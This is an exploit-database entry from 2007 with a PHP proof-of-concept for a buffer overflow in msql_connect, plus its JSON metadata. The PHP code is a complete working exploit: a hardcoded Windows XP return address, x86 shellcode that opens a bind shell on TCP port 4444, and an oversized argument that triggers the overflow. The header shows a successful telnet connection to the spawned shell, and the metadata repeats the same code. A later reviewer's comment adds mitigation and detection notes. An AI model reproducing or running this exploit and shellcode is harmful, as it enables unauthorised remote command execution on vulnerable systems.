ID 1337DAY-ID-7716
Type zdt
Reporter Inphex
Modified 2007-08-08T00:00:00
Description
Exploit for an unknown platform, in the local-exploits category
=====================================================
PHP mSQL (msql_connect) Local Buffer Overflow Exploit
=====================================================
<?php
/*
Inphex
317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.
GET /script.php HTTP/1.1\n
telnet 192.168.2.32 4444
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\apache>
*/
// NOTE(review) — defensive context, not part of the original listing:
// Historical (2007) proof-of-concept against the PHP mSQL extension. The only
// trigger visible here is the oversized first argument handed to
// msql_connect() near the end of the file (a ~49 KB "hostname" string);
// the title calls this a buffer overflow, which presumably means the
// extension copied the argument into a fixed-size buffer without a length
// check — that cannot be verified from this page alone.
// Mitigation: never let caller-controlled strings reach msql_connect() on an
// affected build, and do not load the mSQL extension at all on a hardened
// deployment (it has long since been moved out of PHP core into PECL — confirm
// against the PHP changelog for the exact release). `php -m` or the
// function_exists() guard below shows whether it is present.
// Detection: a connect-string argument of tens of kilobytes is never a
// legitimate hostname; log and alert on argument lengths of that order.
if(!function_exists('msql_connect')) {
die('mSQL extension is not available');
}
$ret = "\xA3\x3D\x92\x7C"; #shell32.dll ->CALL EBP WindowsXP
$shellcode=
"\xbd\xdb\xc6\x38\x8f\xd9\xc9\xd9\x74\x24\xf4\x58\x31\xc9" .
"\xb1\x51\x83\xc0\x04\x31\x68\x0e\x03\xb3\xc8\xda\x7a\xbf" .
"\xbf\xf1\xc8\xd7\xb9\xf9\x2c\xd8\x5a\x8d\xbf\x02\xbf\x1a" .
"\x7a\x76\x34\x60\x80\xfe\x4b\x76\x01\xb1\x53\x03\x49\x6d" .
"\x65\xf8\x3f\xe6\x51\x75\xbe\x16\xa8\x49\x58\x4a\x4f\x89" .
"\x2f\x95\x91\xc0\xdd\x98\xd3\x3e\x29\xa1\x87\xe4\xfa\xa0" .
"\xc2\x6e\xa5\x6e\x0c\x9a\x3c\xe5\x02\x17\x4a\xa6\x06\xa6" .
"\xa7\x5b\x1b\x23\xbe\x37\x47\x2f\xa0\x04\xb6\x94\x46\x01" .
"\xfa\x1a\x0c\x55\xf1\xd1\x62\x49\xa4\x6d\xc2\x79\xe8\x19" .
"\x4d\x37\x1a\x36\x01\x38\xf4\xa0\xf1\xa0\x91\x1f\xc4\x44" .
"\x15\x13\x1a\xcb\x8d\x2c\x8a\x9b\xe6\x3e\xd7\x60\xa9\x3f" .
"\xfe\xc9\xc0\x25\x99\x74\x3f\xad\x64\x23\xaa\xac\x97\x1b" .
"\x42\x68\x6e\x6e\x3e\xdd\x8e\x46\x12\xb1\x23\x35\xc6\x76" .
"\x97\xfa\xbb\x87\xc7\x9a\x53\x69\xb4\x04\xf7\x00\xa5\x5d" .
"\x9f\xb6\x3c\x2d\xa7\xe0\xbf\x1b\x4d\x1f\x11\xf6\x6d\xcf" .
"\xf9\x5c\x3c\xde\x10\xcb\xc0\xc9\xb0\xa6\xc1\x26\x5e\xad" .
"\x77\x41\xd6\x7a\x77\x9b\xb9\xd0\xd3\x71\xc5\x08\x48\x11" .
"\xde\xd1\xa9\x9b\x77\xde\xe0\x09\x87\xf0\x6b\xd8\x13\x96" .
"\x1b\x7f\xb1\xdf\x39\x15\x19\x86\xe8\x26\x10\xdf\x81\xf2" .
"\xaa\xfd\x67\x3b\x5f\xab\x76\xf9\x8d\x55\xc4\xd2\x5e\x24" .
"\xb3\x12\xca\x9d\xef\x0b\x7e\x1f\x5c\xdd\x81\xaa\xe7\x1d" .
"\xab\x0f\xbf\xb3\x05\xfe\x6e\x5e\xa7\x51\xc0\xcb\xf6\xae" .
"\x32\x9b\x55\x89\xb6\x92\xf5\xd6\x6f\x40\x05\xd7\xa7\x6a" .
"\x29\xac\x9f\x68\x49\x76\x7b\x6e\x98\x24\x7b\x40\x4d\x38" .
"\x09\x65\xd1\xeb\xf1\xb0\x12\xdb\x0e\x3d\xed";
// The overlong argument below is the trigger. Affected PHP / mSQL extension
// builds are not identified anywhere on this page; the only environment the
// author names is the Windows XP VM in the header comment.
msql_connect(str_repeat('A',49422)."\xeb\x02".$ret."\x15B".$shellcode."");
?>
{"published": "2007-08-08T00:00:00", "id": "1337DAY-ID-7716", "cvss": {"score": 0.0, "vector": "NONE"}, "description": "Exploit for unknown platform in category local exploits", "enchantments": {"score": {"value": -0.1, "vector": "NONE", "modified": "2018-04-03T15:30:25", "rev": 2}, "dependencies": {"references": [{"type": "metasploit", "idList": ["MSF:PAYLOAD/WINDOWS/X64/METERPRETER/REVERSE_HTTPS", "MSF:EXPLOIT/UNIX/WEBAPP/WP_SYMPOSIUM_SHELL_UPLOAD", "MSF:EXPLOIT/UNIX/WEBAPP/WP_DOWNLOADMANAGER_UPLOAD", "MSF:AUXILIARY/SCANNER/HTTP/GITLAB_USER_ENUM", "MSF:EXPLOIT/LINUX/HTTP/SYMANTEC_WEB_GATEWAY_RESTORE", "MSF:EXPLOIT/MULTI/HTTP/MANAGEENGINE_AUTH_UPLOAD", "MSF:AUXILIARY/SCANNER/HTTP/BMC_TRACKIT_PASSWD_RESET", "MSF:PAYLOAD/CMD/UNIX/REVERSE_RUBY", "MSF:EXPLOIT/SOLARIS/LOCAL/XSCREENSAVER_LOG_PRIV_ESC"]}, {"type": "zdt", "idList": ["1337DAY-ID-23116", "1337DAY-ID-17031"]}, {"type": "kitploit", "idList": ["KITPLOIT:5167596251841349275"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:VULN:7716", "SECURITYVULNS:DOC:938", "SECURITYVULNS:VULN:4397", "SECURITYVULNS:DOC:7716"]}], "modified": "2018-04-03T15:30:25", "rev": 2}, "vulnersScore": -0.1}, "type": "zdt", "lastseen": "2018-04-03T15:30:25", "edition": 2, "title": "PHP mSQL (msql_connect) Local Buffer Overflow Exploit", "href": "https://0day.today/exploit/description/7716", "modified": "2007-08-08T00:00:00", "bulletinFamily": "exploit", "viewCount": 4, "cvelist": [], "sourceHref": "https://0day.today/exploit/7716", "references": [], "reporter": "Inphex", "sourceData": "=====================================================\r\nPHP mSQL (msql_connect) Local Buffer Overflow Exploit\r\n=====================================================\r\n\r\n\r\n\r\n<?php\r\n/*\r\nInphex\r\n317 Bytes , Windows Command Shell Bind TCP Inline , Architecture x86 , Windows TinyXP - vm.\r\n\r\nGET /script.php HTTP/1.1\\n\r\n\r\ntelnet 192.168.2.32 4444\r\nMicrosoft Windows XP [Version 5.1.2600]\r\n(C) Copyright 1985-2001 Microsoft 
Corp.\r\n\r\nC:\\apache>\r\n*/\r\nif(!function_exists('msql_connect')) {\r\ndie('mSQL extension is not available');\r\n}\r\n\r\n$ret = \"\\xA3\\x3D\\x92\\x7C\"; #shell32.dll ->CALL EBP WindowsXP\r\n$shellcode=\r\n\"\\xbd\\xdb\\xc6\\x38\\x8f\\xd9\\xc9\\xd9\\x74\\x24\\xf4\\x58\\x31\\xc9\" .\r\n\"\\xb1\\x51\\x83\\xc0\\x04\\x31\\x68\\x0e\\x03\\xb3\\xc8\\xda\\x7a\\xbf\" .\r\n\"\\xbf\\xf1\\xc8\\xd7\\xb9\\xf9\\x2c\\xd8\\x5a\\x8d\\xbf\\x02\\xbf\\x1a\" .\r\n\"\\x7a\\x76\\x34\\x60\\x80\\xfe\\x4b\\x76\\x01\\xb1\\x53\\x03\\x49\\x6d\" .\r\n\"\\x65\\xf8\\x3f\\xe6\\x51\\x75\\xbe\\x16\\xa8\\x49\\x58\\x4a\\x4f\\x89\" .\r\n\"\\x2f\\x95\\x91\\xc0\\xdd\\x98\\xd3\\x3e\\x29\\xa1\\x87\\xe4\\xfa\\xa0\" .\r\n\"\\xc2\\x6e\\xa5\\x6e\\x0c\\x9a\\x3c\\xe5\\x02\\x17\\x4a\\xa6\\x06\\xa6\" .\r\n\"\\xa7\\x5b\\x1b\\x23\\xbe\\x37\\x47\\x2f\\xa0\\x04\\xb6\\x94\\x46\\x01\" .\r\n\"\\xfa\\x1a\\x0c\\x55\\xf1\\xd1\\x62\\x49\\xa4\\x6d\\xc2\\x79\\xe8\\x19\" .\r\n\"\\x4d\\x37\\x1a\\x36\\x01\\x38\\xf4\\xa0\\xf1\\xa0\\x91\\x1f\\xc4\\x44\" .\r\n\"\\x15\\x13\\x1a\\xcb\\x8d\\x2c\\x8a\\x9b\\xe6\\x3e\\xd7\\x60\\xa9\\x3f\" .\r\n\"\\xfe\\xc9\\xc0\\x25\\x99\\x74\\x3f\\xad\\x64\\x23\\xaa\\xac\\x97\\x1b\" .\r\n\"\\x42\\x68\\x6e\\x6e\\x3e\\xdd\\x8e\\x46\\x12\\xb1\\x23\\x35\\xc6\\x76\" .\r\n\"\\x97\\xfa\\xbb\\x87\\xc7\\x9a\\x53\\x69\\xb4\\x04\\xf7\\x00\\xa5\\x5d\" .\r\n\"\\x9f\\xb6\\x3c\\x2d\\xa7\\xe0\\xbf\\x1b\\x4d\\x1f\\x11\\xf6\\x6d\\xcf\" .\r\n\"\\xf9\\x5c\\x3c\\xde\\x10\\xcb\\xc0\\xc9\\xb0\\xa6\\xc1\\x26\\x5e\\xad\" .\r\n\"\\x77\\x41\\xd6\\x7a\\x77\\x9b\\xb9\\xd0\\xd3\\x71\\xc5\\x08\\x48\\x11\" .\r\n\"\\xde\\xd1\\xa9\\x9b\\x77\\xde\\xe0\\x09\\x87\\xf0\\x6b\\xd8\\x13\\x96\" .\r\n\"\\x1b\\x7f\\xb1\\xdf\\x39\\x15\\x19\\x86\\xe8\\x26\\x10\\xdf\\x81\\xf2\" .\r\n\"\\xaa\\xfd\\x67\\x3b\\x5f\\xab\\x76\\xf9\\x8d\\x55\\xc4\\xd2\\x5e\\x24\" .\r\n\"\\xb3\\x12\\xca\\x9d\\xef\\x0b\\x7e\\x1f\\x5c\\xdd\\x81\\xaa\\xe7\\x1d\" .\r\n\"\\xab\\x0f\\xbf\\xb3\\x05\\xfe\\x6e\\x5e\\xa7\\x51\\xc0\\xcb\\xf6\\xae\" 
.\r\n\"\\x32\\x9b\\x55\\x89\\xb6\\x92\\xf5\\xd6\\x6f\\x40\\x05\\xd7\\xa7\\x6a\" .\r\n\"\\x29\\xac\\x9f\\x68\\x49\\x76\\x7b\\x6e\\x98\\x24\\x7b\\x40\\x4d\\x38\" .\r\n\"\\x09\\x65\\xd1\\xeb\\xf1\\xb0\\x12\\xdb\\x0e\\x3d\\xed\";\r\n//\r\nmsql_connect(str_repeat('A',49422).\"\\xeb\\x02\".$ret.\"\\x15B\".$shellcode.\"\");\r\n?>\r\n\r\n\r\n\n# 0day.today [2018-04-03] #"}
{}